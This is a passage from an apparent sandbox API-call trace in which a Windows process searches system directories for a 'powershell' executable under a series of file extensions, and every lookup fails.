	[0326.992] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.992] SetErrorMode (uMode=0x1) returned 0x1
	[0326.993] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.993] SetErrorMode (uMode=0x1) returned 0x1
	[0326.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.993] SetErrorMode (uMode=0x1) returned 0x1
	[0326.993] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.993] SetErrorMode (uMode=0x1) returned 0x1
	[0326.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.994] SetErrorMode (uMode=0x1) returned 0x1
	[0326.994] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.994] SetErrorMode (uMode=0x1) returned 0x1
	[0326.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.994] SetErrorMode (uMode=0x1) returned 0x1
	[0326.994] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.995] SetErrorMode (uMode=0x1) returned 0x1
	[0326.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.996] SetErrorMode (uMode=0x1) returned 0x1
	[0326.996] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.996] SetErrorMode (uMode=0x1) returned 0x1
	[0326.996] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.996] SetErrorMode (uMode=0x1) returned 0x1
	[0326.996] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.997] SetErrorMode (uMode=0x1) returned 0x1
	[0326.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.997] SetErrorMode (uMode=0x1) returned 0x1
	[0326.997] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.997] SetErrorMode (uMode=0x1) returned 0x1
	[0326.997] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0326.998] SetErrorMode (uMode=0x1) returned 0x1
	[0326.998] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.998] SetErrorMode (uMode=0x1) returned 0x1
	[0326.998] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.998] SetErrorMode (uMode=0x1) returned 0x1
	[0326.998] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.998] SetErrorMode (uMode=0x1) returned 0x1
	[0326.999] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.999] SetErrorMode (uMode=0x1) returned 0x1
	[0326.999] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0326.999] SetErrorMode (uMode=0x1) returned 0x1
	[0326.999] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0326.999] SetErrorMode (uMode=0x1) returned 0x1
	[0326.999] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.000] SetErrorMode (uMode=0x1) returned 0x1
	[0327.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.000] SetErrorMode (uMode=0x1) returned 0x1
	[0327.000] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.000] SetErrorMode (uMode=0x1) returned 0x1
	[0327.000] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.001] SetErrorMode (uMode=0x1) returned 0x1
	[0327.001] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.001] SetErrorMode (uMode=0x1) returned 0x1
	[0327.001] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.001] SetErrorMode (uMode=0x1) returned 0x1
	[0327.001] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.001] SetErrorMode (uMode=0x1) returned 0x1
	[0327.002] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.002] SetErrorMode (uMode=0x1) returned 0x1
	[0327.002] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.002] SetErrorMode (uMode=0x1) returned 0x1
	[0327.002] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.002] SetErrorMode (uMode=0x1) returned 0x1
	[0327.002] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.003] SetErrorMode (uMode=0x1) returned 0x1
	[0327.003] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.003] SetErrorMode (uMode=0x1) returned 0x1
	[0327.003] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.003] SetErrorMode (uMode=0x1) returned 0x1
	[0327.003] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.004] SetErrorMode (uMode=0x1) returned 0x1
	[0327.004] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.004] SetErrorMode (uMode=0x1) returned 0x1
	[0327.004] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.004] SetErrorMode (uMode=0x1) returned 0x1
	[0327.004] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.005] SetErrorMode (uMode=0x1) returned 0x1
	[0327.005] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.005] SetErrorMode (uMode=0x1) returned 0x1
	[0327.005] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.005] SetErrorMode (uMode=0x1) returned 0x1
	[0327.005] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.006] SetErrorMode (uMode=0x1) returned 0x1
	[0327.006] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.006] SetErrorMode (uMode=0x1) returned 0x1
	[0327.006] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.006] SetErrorMode (uMode=0x1) returned 0x1
	[0327.006] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.007] SetErrorMode (uMode=0x1) returned 0x1
	[0327.007] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.007] SetErrorMode (uMode=0x1) returned 0x1
	[0327.007] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.007] SetErrorMode (uMode=0x1) returned 0x1
	[0327.007] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.007] SetErrorMode (uMode=0x1) returned 0x1
	[0327.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.008] SetErrorMode (uMode=0x1) returned 0x1
	[0327.008] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.008] SetErrorMode (uMode=0x1) returned 0x1
	[0327.008] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.008] SetErrorMode (uMode=0x1) returned 0x1
	[0327.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.009] SetErrorMode (uMode=0x1) returned 0x1
	[0327.009] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.009] SetErrorMode (uMode=0x1) returned 0x1
	[0327.009] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.009] SetErrorMode (uMode=0x1) returned 0x1
	[0327.009] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.010] SetErrorMode (uMode=0x1) returned 0x1
	[0327.010] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.010] SetErrorMode (uMode=0x1) returned 0x1
	[0327.726] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.726] SetErrorMode (uMode=0x1) returned 0x1
	[0327.726] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.726] SetErrorMode (uMode=0x1) returned 0x1
	[0327.726] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.727] SetErrorMode (uMode=0x1) returned 0x1
	[0327.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.727] SetErrorMode (uMode=0x1) returned 0x1
	[0327.727] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c8cdba0 | out: lpFindFileData=0x1c8cdba0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.727] SetErrorMode (uMode=0x1) returned 0x1
	[0327.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8cda00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.728] SetErrorMode (uMode=0x1) returned 0x1
